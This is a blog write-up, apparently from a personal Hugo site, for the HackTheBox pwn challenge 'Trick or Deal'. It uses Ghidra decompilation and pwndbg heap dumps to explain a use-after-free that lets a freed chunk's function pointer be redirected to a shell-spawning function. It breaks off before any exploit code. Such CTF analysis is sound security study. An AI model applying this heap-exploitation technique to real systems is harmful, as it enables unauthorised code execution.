<!DOCTYPE html>
<html>
    <head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <title>Writeup: Trick or Deal &middot; </title>
        <meta name="description" content="Introduction
Trick or Deal is a Medium retired hackthebox pwn challenge. It has 97 solves and no writeup at the publication of this blog post.
This binary has a secret function unlock_storage(), and a Use-After-Free vulnerability.
To exploit this binary, I will use pwndbg and pwntools.
Ghidra was also used for the analysis. The snippets of C code were obtained using the Ghidra decompiler.
Analysis
The binary gives us a menu with 5 actions. Each action will call a function.">
        <meta name="HandheldFriendly" content="True">
        <meta name="MobileOptimized" content="320">
        <meta name="generator" content="Hugo 0.147.8">
        <meta name="robots" content="index,follow">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        
        <link rel="stylesheet" href="http://localhost:1313/dist/site.css">
        <link rel="stylesheet" href="http://localhost:1313/dist/syntax.css">
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,600,700,300&subset=latin,cyrillic-ext,latin-ext,cyrillic">
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">
        
        
        
        
        

    </head>
    <body>
        

        <div id="wrapper">
            <header class="site-header">
                <div class="container">
                    <div class="site-title-wrapper">
                        
                            <h1 class="site-title">
                                <a href="http://localhost:1313/">Olivier LASNE</a>
                            </h1>
                        
                        
                        
                        
                        
                        
                        
                        
                        
                    </div>

                    <ul class="site-nav">
                        

                    </ul>
                </div>
            </header>

            <div id="container">


<div class="container">
    <article class="post-container">
        <header class="post-header">
    <h1 class="post-title">Writeup: Trick or Deal</h1>
    
</header>

        <div class="post-content clearfix">
    

    <h1 id="introduction">Introduction</h1>
<p><strong>Trick or Deal</strong> is a <em>Medium</em> retired <a href="https://app.hackthebox.com/challenges/trick-or-deal">hackthebox</a> <em><strong>pwn</strong></em> challenge. It has 97 solves and no writeup at the publication of this blog post.</p>
<p>This binary has a secret function <code>unlock_storage()</code>, and a <strong>Use-After-Free</strong> vulnerability.</p>
<p>To exploit this binary, I will use <a href="https://github.com/pwndbg/pwndbg">pwndbg</a> and <a href="https://docs.pwntools.com/en/stable/">pwntools</a>.<br>
<a href="https://ghidra-sre.org/">Ghidra</a> was also used for the analysis. The snippets of <strong>C</strong> code were obtained using the <em>Ghidra decompiler</em>.</p>
<h1 id="analysis">Analysis</h1>
<p>The binary gives us a <strong>menu</strong> with <strong>5 actions</strong>. Each action will call a function.</p>
<pre tabindex="0"><code>-_-_-_-_-_-_-_-_-_-_-_-_-
|                       |
|  [1] See the Weaponry |
|  [2] Buy Weapons      |
|  [3] Make an Offer    |
|  [4] Try to Steal     |
|  [5] Leave            |
|                       |
-_-_-_-_-_-_-_-_-_-_-_-_-

[*] What do you want to do?
</code></pre><p>Let&rsquo;s investigate.</p>
<h3 id="not-interesting">Not interesting</h3>
<p>The <em>5th action</em> simply quit the binary.</p>
<p>The <em>2nd action</em> <code>[2] Buy Weapons</code> call the function <strong><code>buy()</code></strong> and has <strong>no interest</strong> for us.<br>
It simply output back our input.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">buy</span>(<span style="color:#66d9ef">void</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">char</span> buf [<span style="color:#ae81ff">72</span>];
</span></span><span style="display:flex;"><span>  
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">fwrite</span>(<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">[*] What do you want!!? &#34;</span>,<span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">25</span>,stdout);
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">read</span>(<span style="color:#ae81ff">0</span>,buf,<span style="color:#ae81ff">71</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">fprintf</span>(stdout,<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">[!] No!, I can</span><span style="color:#ae81ff">\&#39;</span><span style="color:#e6db74">t give you %s</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>,buf);
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">fflush</span>(stdout);
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">fwrite</span>(<span style="color:#e6db74">&#34;[!] Get out of here!</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>,<span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">21</span>,stdout);
</span></span><span style="display:flex;"><span>  
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">return</span>;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><h3 id="the-heap">The Heap</h3>
<p>The <em>actions 1, 3 and 4</em> are more interesting. But first, let&rsquo;s take a look at the <strong>heap</strong>.</p>
<p>We run the binary in <strong>gdb</strong> (with the <a href="https://github.com/pwndbg/pwndbg">pwndbg</a> extension).<br>
Simply <strong>break</strong> with <code>Ctrl + C</code> and use the <strong><code>vis_heap_chunks</code></strong> command to explore the <strong>heap</strong>.</p>


<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code style="background-color:initial;">$ gdb -q ./trick_or_deal

<font color="#F92672"><b>pwndbg&gt; </b></font>r
Starting program: <font color="#A6E22E">/home/hackthebox/challenge/pwn/Trick_or_Deal/trick_or_deal</font> 
💵 <font color="#AE81FF"><b> Welcome to the Intergalactic Weapon Black Market 💵</b></font>

<font color="#A6E22E"><b>Loading the latest weaponry . . .</b></font>

<font color="#AE81FF"><b>-_-_-_-_-_-_-_-_-_-_-_-_-</b></font>
<font color="#AE81FF"><b>|                       |</b></font>
<font color="#AE81FF"><b>|  [1] See the Weaponry |</b></font>
<font color="#AE81FF"><b>|  [2] Buy Weapons      |</b></font>
<font color="#AE81FF"><b>|  [3] Make an Offer    |</b></font>
<font color="#AE81FF"><b>|  [4] Try to Steal     |</b></font>
<font color="#AE81FF"><b>|  [5] Leave            |</b></font>
<font color="#AE81FF"><b>|                       |</b></font>
<font color="#AE81FF"><b>-_-_-_-_-_-_-_-_-_-_-_-_-</b></font>

<font color="#AE81FF"><b>[*] What do you want to do? ^C</b></font>
<font color="#AE81FF"><b>Program received signal SIGINT, Interrupt.</b></font>
<font color="#66D9EF"><b>0x00007ffff7ee3002</b></font> in <font color="#F4BF75">read</font> () from <font color="#A6E22E">./glibc/libc.so.6</font>

<font color="#F92672"><b>pwndbg&gt; </b></font>vis_heap_chunks 

0x555555603000  <font color="#F4BF75">0x0000000000000000</font> <font color="#A1EFE4">0x0000000000000291</font> <font color="#A1EFE4">................</font>
0x555555603010  <font color="#A1EFE4">0x0000000000000000</font> <font color="#A1EFE4">0x0000000000000000</font> <font color="#A1EFE4">................</font>
[...]

0x555555603290  <font color="#A1EFE4">0x0000000000000000</font> <font color="#AE81FF">0x0000000000000061</font> <font color="#AE81FF">........a.......</font>
0x5555556032a0  <font color="#AE81FF">0x67694c206568540a</font> <font color="#AE81FF">0x0a72656261737468</font> <font color="#AE81FF">.The Lightsaber.</font>
0x5555556032b0  <font color="#AE81FF">0x6e6f53206568540a</font> <font color="#AE81FF">0x7765726353206369</font> <font color="#AE81FF">.The Sonic Screw</font>
0x5555556032c0  <font color="#AE81FF">0x0a0a726576697264</font> <font color="#AE81FF">0x0a73726573616850</font> <font color="#AE81FF">driver..Phasers.</font>
0x5555556032d0  <font color="#AE81FF">0x696f4e206568540a</font> <font color="#AE81FF">0x6b63697243207973</font> <font color="#AE81FF">.The Noisy Crick</font>
0x5555556032e0  <font color="#AE81FF">0x00000000000a7465</font> <font color="#AE81FF">0x0000555555400be6</font> <font color="#AE81FF">et........@UUU..</font>
0x5555556032f0  <font color="#AE81FF">0x0000000000000000</font> <font color="#A6E22E">0x0000000000020d11</font> <font color="#A6E22E">................</font>  &lt;-- Top chunk
</code></pre></div>


<p>At the <strong>address <code>0x555555603290</code></strong>, we have a <strong>chunk</strong> of size <em>0x60</em>.</p>
<h4 id="mixed-data-and-function-pointers">Mixed data and function pointers</h4>
<p>The <em>chunk</em> is the variable <strong><code>storage</code></strong> which contain some <strong>data</strong>, and a <strong>pointer</strong> to <strong><code>printStorage()</code></strong>: <code>0x555555400be6</code>.<br>
We can see that <code>0x555555603290</code> is a pointer to <code>printStorage()</code> using the <strong><code>disassemble</code></strong> command.</p>


<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code style="background-color:initial;"><font color="#F92672"><b>pwndbg&gt; </b></font>disassemble 0x0000555555400be6
Dump of assembler code for function <font color="#F4BF75">printStorage</font>:
   <font color="#66D9EF">0x0000555555400be6</font> &lt;+0&gt;:  <font color="#A6E22E">push</font><font color="#F8F8F2">   </font><font color="#F92672">rbp</font>
   <font color="#66D9EF">0x0000555555400be7</font> &lt;+1&gt;:  <font color="#A6E22E">mov</font><font color="#F8F8F2">    </font><font color="#F92672">rbp</font>,<font color="#F92672">rsp</font>
   <font color="#66D9EF">0x0000555555400bea</font> &lt;+4&gt;:  <font color="#A6E22E">mov</font><font color="#F8F8F2">    </font><font color="#F92672">rax</font>,<font color="#F92672">QWORD</font><font color="#F8F8F2"> </font><font color="#F92672">PTR</font><font color="#F8F8F2"> </font>[<font color="#F92672">rip</font><font color="#F92672"><u style="text-decoration-style:single">+</u></font><font color="#66D9EF">0x20144f</font>]<font color="#F8F8F2">        # 0x555555602040 &lt;storage&gt;</font>
   <font color="#66D9EF">0x0000555555400bf1</font> &lt;+11&gt;: <font color="#A6E22E">mov</font><font color="#F8F8F2">    </font><font color="#F92672">rdx</font>,<font color="#F92672">rax</font>
   <font color="#66D9EF">0x0000555555400bf4</font> &lt;+14&gt;: <font color="#A6E22E">mov</font><font color="#F8F8F2">    </font><font color="#F92672">rax</font>,<font color="#F92672">QWORD</font><font color="#F8F8F2"> </font><font color="#F92672">PTR</font><font color="#F8F8F2"> </font>[<font color="#F92672">rip</font><font color="#F92672"><u style="text-decoration-style:single">+</u></font><font color="#66D9EF">0x201425</font>]<font color="#F8F8F2">        # 0x555555602020 &lt;stdout@@GLIBC_2.2.5&gt;</font>
   <font color="#66D9EF">0x0000555555400bfb</font> &lt;+21&gt;: <font color="#A6E22E">lea</font><font color="#F8F8F2">    </font><font color="#F92672">r8</font>,[<font color="#F92672">rip</font><font color="#F92672"><u style="text-decoration-style:single">+</u></font><font color="#66D9EF">0x63f</font>]<font color="#F8F8F2">        # 0x555555401241</font>
   <font color="#66D9EF">0x0000555555400c02</font> &lt;+28&gt;: <font color="#A6E22E">mov</font><font color="#F8F8F2">    </font><font color="#F92672">rcx</font>,<font color="#F92672">rdx</font>
   <font color="#66D9EF">0x0000555555400c05</font> &lt;+31&gt;: <font color="#A6E22E">lea</font><font color="#F8F8F2">    </font><font color="#F92672">rdx</font>,[<font color="#F92672">rip</font><font color="#F92672"><u style="text-decoration-style:single">+</u></font><font color="#66D9EF">0x67f</font>]<font color="#F8F8F2">        # 0x55555540128b</font>
   <font color="#66D9EF">0x0000555555400c0c</font> &lt;+38&gt;: <font color="#A6E22E">lea</font><font color="#F8F8F2">    </font><font color="#F92672">rsi</font>,[<font color="#F92672">rip</font><font color="#F92672"><u style="text-decoration-style:single">+</u></font><font color="#66D9EF">0x6ad</font>]<font color="#F8F8F2">        # 0x5555554012c0</font>
   <font color="#66D9EF">0x0000555555400c13</font> &lt;+45&gt;: <font color="#A6E22E">mov</font><font color="#F8F8F2">    </font><font color="#F92672">rdi</font>,<font color="#F92672">rax</font>
   <font color="#66D9EF">0x0000555555400c16</font> &lt;+48&gt;: <font color="#A6E22E">mov</font><font color="#F8F8F2">    </font><font color="#F92672">eax</font>,<font color="#66D9EF">0x0</font>
   <font color="#66D9EF">0x0000555555400c1b</font> &lt;+53&gt;: <font color="#A6E22E">call</font><font color="#F8F8F2">   </font><font color="#66D9EF">0x555555400920</font> &lt;<font color="#F92672">fprintf@plt</font>&gt;
   <font color="#66D9EF">0x0000555555400c20</font> &lt;+58&gt;: <font color="#A6E22E">nop</font>
   <font color="#66D9EF">0x0000555555400c21</font> &lt;+59&gt;: <font color="#A6E22E">pop</font><font color="#F8F8F2">    </font><font color="#F92672">rbp</font>
   <font color="#66D9EF">0x0000555555400c22</font> &lt;+60&gt;: <font color="#A6E22E">ret</font><font color="#F8F8F2">    </font>
End of assembler dump.
</code></pre></div>


<p>The content of <strong><code>storage</code></strong> is written by the function <strong><code>update_weapons()</code></strong>. <code>update_weapons()</code> is called by <code>main</code> at the start of the program:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">update_weapons</span>(<span style="color:#66d9ef">void</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  storage <span style="color:#f92672">=</span> (<span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>)<span style="color:#a6e22e">malloc</span>(<span style="color:#ae81ff">0x50</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">strcpy</span>(storage,<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">The Lightsaber</span><span style="color:#ae81ff">\n\n</span><span style="color:#e6db74">The Sonic Screwdriver</span><span style="color:#ae81ff">\n\n</span><span style="color:#e6db74">Phasers</span><span style="color:#ae81ff">\n\n</span><span style="color:#e6db74">The Noisy Cricket</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">*</span>(code <span style="color:#f92672">**</span>)(storage <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x48</span>) <span style="color:#f92672">=</span> printStorage;
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">return</span>;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Having functions pointers mixed with data is interesting for us. If we can tamper with a function pointer, it might give us the ability to call other functions.</p>
<h2 id="useful-functions">Useful functions</h2>
<h3 id="see-the-data">See the data</h3>
<p>The <em>1st action</em> <code>[1] See the Weaponry</code> will call the <strong>pointer</strong> at the <strong>end</strong> of the <strong>chunk</strong> to call <strong><code>printStorage()</code></strong>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">printStorage</span>(<span style="color:#66d9ef">void</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">fprintf</span>(stdout,<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">%sWeapons in stock: </span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> %s %s&#34;</span>,<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x1b</span><span style="color:#e6db74">[1;32m&#34;</span>,storage,<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x1b</span><span style="color:#e6db74">[1;35m&#34;</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">return</span>;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p><code>printStorage()</code> will output the content of the global variable <strong><code>storage</code></strong>.</p>


<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code style="background-color:initial;">$ ./trick_or_deal
💵 <font color="#AE81FF"><b> Welcome to the Intergalactic Weapon Black Market 💵</b></font>
[...]

<font color="#AE81FF"><b>[*] What do you want to do? 1</b></font>

<font color="#A6E22E"><b>Weapons in stock: </b></font>
<font color="#A6E22E"><b> </b></font>
<font color="#A6E22E"><b>The Lightsaber</b></font>

<font color="#A6E22E"><b>The Sonic Screwdriver</b></font>

<font color="#A6E22E"><b>Phasers</b></font>

<font color="#A6E22E"><b>The Noisy Cricket</b></font>
</code></pre></div>


<h3 id="free">Free()</h3>
<p>The <em>4th action</em> call the function <code>steal()</code> that <strong>free</strong> the variable <strong><code>storage</code></strong>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">steal</span>(<span style="color:#66d9ef">void</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">fwrite</span>(<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">[*] Sneaks into the storage room wearing a face mask . . . </span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>,<span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">0x3d</span>,stdout);
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">sleep</span>(<span style="color:#ae81ff">2</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">fprintf</span>(stdout,<span style="color:#e6db74">&#34;%s[*] Guard: *Spots you*, Thief! Lockout the storage!</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>,<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x1b</span><span style="color:#e6db74">[1;31m&#34;</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">free</span>(storage);
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">sleep</span>(<span style="color:#ae81ff">2</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">fprintf</span>(stdout,<span style="color:#e6db74">&#34;%s[*] You, who didn</span><span style="color:#ae81ff">\&#39;</span><span style="color:#e6db74">t skip leg-day, escape!%s</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>,<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x1b</span><span style="color:#e6db74">[1;32m&#34;</span>,<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x1b</span><span style="color:#e6db74">[1;35m&#34;</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">return</span>;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Let&rsquo;s see this in action with <em>gdb</em>.</p>


<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code style="background-color:initial;">$ gdb ./trick_or_deal

<font color="#F92672"><b>pwndbg&gt; </b></font>run
💵 <font color="#AE81FF"><b> Welcome to the Intergalactic Weapon Black Market 💵</b></font>
[...]

<font color="#AE81FF"><b>[*] What do you want to do? 4</b></font>

<font color="#AE81FF"><b>[*] Sneaks into the storage room wearing a face mask . . . </b></font>
<font color="#F92672"><b>[*] Guard: *Spots you*, Thief! Lockout the storage!</b></font>
<font color="#A6E22E"><b>[*] You, who didn&apos;t skip leg-day, escape!</b></font>

<font color="#AE81FF"><b>Program received signal SIGINT, Interrupt.</b></font>
<font color="#66D9EF"><b>0x00007ffff7ee3002</b></font> in <font color="#F4BF75">read</font> () from <font color="#A6E22E">./glibc/libc.so.6</font>

<font color="#F92672"><b>pwndbg&gt; </b></font>heap
<font color="#F4BF75">Allocated chunk</font> | <font color="#F4BF75">PREV_INUSE</font>
Addr: <font color="#66D9EF">0x555555603000</font>
Size: 0x291

<font color="#A6E22E">Free chunk (tcachebins)</font> | <font color="#F4BF75">PREV_INUSE</font>
Addr: <font color="#66D9EF">0x555555603290</font>
Size: 0x61
<font color="#F92672">fd</font>: 0x00

<font color="#F92672">Top chunk</font> | <font color="#F4BF75">PREV_INUSE</font>
Addr: <font color="#66D9EF">0x5555556032f0</font>
Size: 0x20d11

<font color="#F92672"><b>pwndbg&gt; </b></font>vis_heap_chunks 

0x555555603000  <font color="#F4BF75">0x0000000000000000</font> <font color="#A1EFE4">0x0000000000000291</font> <font color="#A1EFE4">................</font>
0x555555603010  <font color="#A1EFE4">0x0000000000000000</font> <font color="#A1EFE4">0x0000000000000001</font> <font color="#A1EFE4">................</font>
0x555555603020  <font color="#A1EFE4">0x0000000000000000</font> <font color="#A1EFE4">0x0000000000000000</font> <font color="#A1EFE4">................</font>
[...]
0x555555603290  <font color="#A1EFE4">0x0000000000000000</font> <font color="#AE81FF">0x0000000000000061</font> <font color="#AE81FF">........a.......</font>
0x5555556032a0  <font color="#AE81FF">0x0000000000000000</font> <font color="#AE81FF">0x0000555555603010</font> <font color="#AE81FF">.........0`UUU..</font>  &lt;-- tcachebins[0x60][0/1]
0x5555556032b0  <font color="#AE81FF">0x6e6f53206568540a</font> <font color="#AE81FF">0x7765726353206369</font> <font color="#AE81FF">.The Sonic Screw</font>
0x5555556032c0  <font color="#AE81FF">0x0a0a726576697264</font> <font color="#AE81FF">0x0a73726573616850</font> <font color="#AE81FF">driver..Phasers.</font>
0x5555556032d0  <font color="#AE81FF">0x696f4e206568540a</font> <font color="#AE81FF">0x6b63697243207973</font> <font color="#AE81FF">.The Noisy Crick</font>
0x5555556032e0  <font color="#AE81FF">0x00000000000a7465</font> <font color="#AE81FF">0x0000555555400be6</font> <font color="#AE81FF">et........@UUU..</font>
0x5555556032f0  <font color="#AE81FF">0x0000000000000000</font> <font color="#A6E22E">0x0000000000020d11</font> <font color="#A6E22E">................</font>  &lt;-- Top chu
</pre></code></pre></div>


<h3 id="malloc">Malloc()</h3>
<p>The <em>3rd action</em> call the function <code>make_offer()</code> that <strong>malloc</strong> an arbitrary sized chunk. And let us write data in this new <em>chunk</em>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">make_offer</span>(<span style="color:#66d9ef">void</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">char</span> anwser [<span style="color:#ae81ff">3</span>];
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">size_t</span> size;
</span></span><span style="display:flex;"><span>  
</span></span><span style="display:flex;"><span>  size <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">memset</span>(anwser,<span style="color:#ae81ff">0</span>,<span style="color:#ae81ff">3</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">fwrite</span>(<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">[*] Are you sure that you want to make an offer(y/n): &#34;</span>,<span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">55</span>,stdout);
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">read</span>(<span style="color:#ae81ff">0</span>,anwser,<span style="color:#ae81ff">2</span>);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> (anwser[<span style="color:#ae81ff">0</span>] <span style="color:#f92672">==</span> <span style="color:#e6db74">&#39;y&#39;</span>) {
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">fwrite</span>(<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">[*] How long do you want your offer to be? &#34;</span>,<span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">45</span>,stdout);
</span></span><span style="display:flex;"><span>    size <span style="color:#f92672">=</span> <span style="color:#a6e22e">read_num</span>();
</span></span><span style="display:flex;"><span>    offer <span style="color:#f92672">=</span> <span style="color:#a6e22e">malloc</span>(size);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">fwrite</span>(<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">[*] What can you offer me? &#34;</span>,<span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">28</span>,stdout);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">read</span>(<span style="color:#ae81ff">0</span>,offer,size);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">fwrite</span>(<span style="color:#e6db74">&#34;[!] That</span><span style="color:#ae81ff">\&#39;</span><span style="color:#e6db74">s not enough!</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>,<span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">23</span>,stdout);
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">else</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">fwrite</span>(<span style="color:#e6db74">&#34;[!] Don</span><span style="color:#ae81ff">\&#39;</span><span style="color:#e6db74">t bother me again.</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>,<span style="color:#ae81ff">1</span>,<span style="color:#ae81ff">27</span>,stdout);
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">return</span>;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Again, let&rsquo;s do this in <em>gdb</em> and observe the memory with <code>vis_heap_chunks</code>.</p>


<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code style="background-color:initial;">$ gdb -q ./trick_or_deal

<font color="#F92672"><b>pwndbg&gt; </b></font>r
Starting program: <font color="#A6E22E">./trick_or_deal</font> 

💵 <font color="#AE81FF"><b> Welcome to the Intergalactic Weapon Black Market 💵</b></font>
[...]

<font color="#AE81FF"><b>[*] What do you want to do? 3</b></font>

<font color="#AE81FF"><b>[*] Are you sure that you want to make an offer(y/n): y</b></font>

<font color="#AE81FF"><b>[*] How long do you want your offer to be? 32</b></font>

<font color="#AE81FF"><b>[*] What can you offer me? YYYYYYYYYYYYYYYY</b></font>
<font color="#AE81FF"><b>[!] That&apos;s not enough!</b></font>

<font color="#AE81FF"><b>^C</b></font>
<font color="#AE81FF"><b>Program received signal SIGINT, Interrupt.</b></font>
<font color="#66D9EF"><b>0x00007ffff7ee3002</b></font> in <font color="#F4BF75">read</font> () from <font color="#A6E22E">./glibc/libc.so.6</font>

<font color="#F92672"><b>pwndbg&gt; </b></font>vis_heap_chunks 2 0x555555603290

0x555555603290  <font color="#F4BF75">0x0000000000000000</font> <font color="#A1EFE4">0x0000000000000061</font> <font color="#A1EFE4">........a.......</font>
0x5555556032a0  <font color="#A1EFE4">0x67694c206568540a</font> <font color="#A1EFE4">0x0a72656261737468</font> <font color="#A1EFE4">.The Lightsaber.</font>
0x5555556032b0  <font color="#A1EFE4">0x6e6f53206568540a</font> <font color="#A1EFE4">0x7765726353206369</font> <font color="#A1EFE4">.The Sonic Screw</font>
0x5555556032c0  <font color="#A1EFE4">0x0a0a726576697264</font> <font color="#A1EFE4">0x0a73726573616850</font> <font color="#A1EFE4">driver..Phasers.</font>
0x5555556032d0  <font color="#A1EFE4">0x696f4e206568540a</font> <font color="#A1EFE4">0x6b63697243207973</font> <font color="#A1EFE4">.The Noisy Crick</font>
0x5555556032e0  <font color="#A1EFE4">0x00000000000a7465</font> <font color="#A1EFE4">0x0000555555400be6</font> <font color="#A1EFE4">et........@UUU..</font>
0x5555556032f0  <font color="#A1EFE4">0x0000000000000000</font> <font color="#AE81FF">0x0000000000000031</font> <font color="#AE81FF">........1.......</font>
0x555555603300  <font color="#AE81FF">0x5959595959595959</font> <font color="#AE81FF">0x5959595959595959</font> <font color="#AE81FF">YYYYYYYYYYYYYYYY</font>
0x555555603310  <font color="#AE81FF">0x000000000000000a</font> <font color="#AE81FF">0x0000000000000000</font> <font color="#AE81FF">................</font>
0x555555603320  <font color="#AE81FF">0x0000000000000000</font> <font color="#A6E22E">0x0000000000020ce1</font> <font color="#A6E22E">................</font>  &lt;-- Top chunk
</code></pre></div>


<h3 id="secret-function">Secret function</h3>
<p>The binary has a secret function <code>unlock_storage()</code>. We can see below in Ghidra. You can also see it in <em>rizin</em> or <em>radare2</em> using the <code>afl</code> command.</p>
<p><img src="/trick_or_deal/trick_or_deal_functions2.png" alt="Functions in Ghidra"></p>
<p>Calling this function gives us a <strong>shell</strong>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-C" data-lang="C"><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">unlock_storage</span>(<span style="color:#66d9ef">void</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>{
